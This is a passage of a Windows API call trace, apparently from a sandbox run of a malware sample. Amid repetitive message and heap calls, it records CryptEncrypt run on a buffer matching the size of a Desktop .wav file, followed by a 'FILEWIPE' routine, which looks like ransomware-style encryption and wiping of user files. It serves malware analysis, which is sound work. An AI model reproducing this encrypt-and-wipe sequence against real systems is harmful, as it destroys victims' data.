lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.328] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0161.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0161.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0161.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0161.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0161.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0161.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.329] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.329] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.329] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.329] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.329] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.329] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.329] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.329] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.330] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0161.330] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.330] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.330] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.330] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.330] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.330] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.330] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.330] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.330] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.330] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.330] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.331] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.331] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x14234, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x14240) returned 1 [0161.331] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.332] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.332] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.332] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.332] CharLowerBuffW (in: lpsz="byte[82497]", cchLength=0xb | out: lpsz="byte[82497]") returned 0xb [0161.332] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.333] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.333] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.333] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.333] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.333] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa01840*, pdwDataLen=0x87e820*=0x14234, dwBufLen=0x14240 | out: pbData=0xa01840*, pdwDataLen=0x87e820*=0x14240) returned 1 [0161.334] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.334] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.334] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.334] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.334] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.334] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.334] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.334] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.334] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.334] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.334] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.334] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.334] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.334] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0161.334] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.334] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.334] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.341] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.341] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.341] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.346] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.346] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.346] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0161.346] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.346] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.346] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0161.346] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.346] CryptDestroyKey (hKey=0x90aed8) returned 1 [0161.346] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.346] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.346] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.347] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.347] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.347] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0161.347] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0161.390] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.391] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0161.391] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.391] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.391] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.391] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.391] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.391] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.391] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.391] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.391] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.391] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.391] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0161.391] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.391] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.391] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0161.391] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.392] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0161.392] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.392] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0161.392] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.392] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0161.392] FreeLibrary (hLibModule=0x74f20000) returned 1 [0161.392] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.392] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.392] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.392] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.393] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.393] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.394] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0161.394] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.395] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.395] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f29a7a0, ftCreationTime.dwHighDateTime=0x1d5e792, ftLastAccessTime.dwLowDateTime=0xea88a2f0, ftLastAccessTime.dwHighDateTime=0x1d5e311, ftLastWriteTime.dwLowDateTime=0xea88a2f0, ftLastWriteTime.dwHighDateTime=0x1d5e311, nFileSizeHigh=0x0, nFileSizeLow=0x14234, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gJmnMJqziFMsIe_.wav", cAlternateFileName="GJMNMJ~1.WAV")) returned 0x90ae18 [0161.396] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0161.396] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0161.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0161.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0161.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0161.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0161.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0161.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0161.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0161.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0161.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0161.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0161.397] CharLowerBuffW (in: lpsz="byte[82484]", cchLength=0xb | out: lpsz="byte[82484]") returned 0xb [0161.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0161.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0161.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0161.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0161.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0161.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0161.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0161.398] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0161.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.398] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0161.398] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0161.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0161.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0161.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0161.398] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0161.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0161.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.398] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0161.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0161.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0161.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0161.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2768 [0161.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2768, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0161.399] FreeLibrary (hLibModule=0x75c90000) returned 1 [0161.399] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.399] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.399] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0161.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0161.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0161.399] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0161.399] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0161.399] 